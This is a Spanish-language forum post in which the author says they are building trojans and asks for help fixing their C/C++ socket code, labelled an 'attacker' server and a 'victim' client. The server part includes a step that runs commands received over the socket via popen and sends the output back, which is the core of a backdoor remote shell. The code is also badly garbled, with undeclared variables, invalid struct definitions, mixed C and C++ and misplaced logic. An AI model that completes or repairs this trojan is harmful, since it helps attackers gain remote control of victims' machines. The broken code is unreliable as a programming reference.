Muy Buenas Señores,
Estoy creando e informandome sobre troyanos i sockets, pero aun me faltan algunos conocimientos, necessito que alguien me ayude con mis codigos, alguien puede ayudarme porfavor??
este son los codigos:
el servidor ( en este caso e atacante )
Código: text
y este es el codigo de el cliente ( en este caso la victima )
Código: text
Espero que me podais ayudar porfavor, Muchas gracias por vuestra atención.
Estoy creando e informandome sobre troyanos i sockets, pero aun me faltan algunos conocimientos, necessito que alguien me ayude con mis codigos, alguien puede ayudarme porfavor??
este son los codigos:
el servidor ( en este caso e atacante )
/* Estos son los ficheros de cabecera usuales */
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define PORT 8080 /* El puerto que será abierto */
#define BACKLOG 2 /* El número de conexiones permitidas */
int main()
{
int socket(int /*DOMAIN*/,int SOCK_STREAM,int /*Protocol*/);
int fd, fd2; /* los ficheros descriptores */
struct sockaddr_in server;
/* para la información de la dirección del servidor */
struct sockaddr_in client;
/* para la información de la dirección del cliente */
int sin_size;
/* A continuación la llamada a socket() */
if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ) {
printf("error en socket()\n");
exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(PORT);
/* ¿Recuerdas a htons() de la sección "Conversiones"? =) */
server.sin_addr.s_addr = INADDR_ANY;
/* INADDR_ANY coloca nuestra dirección IP automáticamente */
bzero(&(server.sin_zero),8);
/* escribimos ceros en el reto de la estructura */
/* A continuación la llamada a bind() */
if(bind(fd,(struct sockaddr*)&server,
sizeof(struct sockaddr))==-1) {
printf("error en bind() \n");
exit(-1);
}
if(listen(fd,BACKLOG) == -1) { /* llamada a listen() */
printf("error en listen()\n");
exit(-1);
}
while(1) {
sin_size=sizeof(struct sockaddr_in);
/* A continuación la llamada a accept() */
if ((fd2 = accept(fd,(struct sockaddr *)&client,
&sin_size))==-1) {
printf("error en accept()\n");
exit(-1);
}
printf("Se obtuvo una conexión desde %s\n",
inet_ntoa(client.sin_addr) );
/* que mostrará la IP del cliente */
send(fd2,"Bienvenido a mi servidor.\n",22,0);
/* que enviará el mensaje de bienvenida al cliente */
/* Limpiar la consola */
system("cls");
/* Ejecutar el comando enviado desde el servidor en el cliente */
/* Obtener el resultado del comando para posteriormente enviarlo al servidor */
FILE *msg = popen(serverMsg, "r");
char buffer[2048];
string resultado = "";
while (!feof(msg))
{
if(fgets(buffer, 2048, msg) != NULL)
{
resultado += buffer;
}
}
pclose(msg);
/* Enviar el resultado de la consulta al servidor */
send(socket, resultado.c_str(), 2048, 0);
//Cerrar la conexión
closesocket(sock);
//Llamar nuevamente a la función
main();
}
}
exit(fd2); /* cierra fd2 */
}
}
y este es el codigo de el cliente ( en este caso la victima )
#include <iostream>
#include<stdio.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<netdb.h>
//definimos puerto abierto
#define PORT 8080
//definimos el maximo de datos
#define MAXDATASIZE 100
using namespace std;
int main(int argc, char *argv[])
{
//Ficheros descriptores
int bind (int fd, int numbytes, struct sockaddr *my_addr,int addrlen);
//Ponemos que es el host
char *host = "localhost";
//Despues ponemos donde se almacenara el texto recibido i añadimos maximo
char buf[MAXDATASIZE];
/* Ahora procederemos ha construir la estructura
la cual recibiremos informacion sobre el nodo remoto*/
struct hostent *he;
{
char *h_name; /* El nombre oficial del nodo. */
char **h_aliases; /* Lista de Alias. */
int h_addrtype; /* Tipo de dirección del nodo. */
int h_length; /* Longitud de la dirección. */
char **h_addr_list; /* Lista de direcciones del nombre del */
/* servidor. */
#define h_addr h_addr_list[0] /* Dirección, para la compatibilidad con */
/* anteriores. */
};
/*hora procederemos a hacer la estructura sobre la direcciones
del servividor */
struct sockaddr_in server;
{
short int sin_family; /* Familia de la Dirección */
unsigned short int PORT; /* Puerto */
struct in_addr sin_addr; /* Dirección de Internet */
unsigned char sin_zero[8]; /* Del mismo tamaño que struct sockaddr */
};
if (argc !=2) {
/* esto es porque nuestro programa sólo necesitará un
argumento, (la IP) */
printf("Uso: %s <Dirección IP>\n",argv[0]);
exit(-1);
}
if ((he=gethostbyname(argv[1]))==NULL){
/* llamada a gethostbyname() */
printf("gethostbyname() error\n");
exit(-1);
}
if ((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){
/* llamada a socket() */
printf("socket() error\n");
exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(PORT);
/* htons() es necesaria nuevamente ;-o */
server.sin_addr = *((struct in_addr *)he->h_addr);
/*he->h_addr pasa la información de ``*he'' a "h_addr" */
bzero(&(server.sin_zero),8);
if(connect(fd, (struct sockaddr *)&server,
sizeof(struct sockaddr))==-1){
/* llamada a connect() */
printf("connect() error\n");
exit(-1);
}
if ((MAXDATASIZE=recv(fd,buf,MAXDATASIZE,0)) == -1){
/* llamada a recv() */
printf("Error en recv() \n");
exit(-1);
}
buf[MAXDATASIZE]='\0';
printf("Mensaje del Servidor: %s\n",buf);
/* muestra el mensaje de bienvenida del servidor =) */
int shutdown(fd); /* cerramos fd =) */
}
Espero que me podais ayudar porfavor, Muchas gracias por vuestra atención.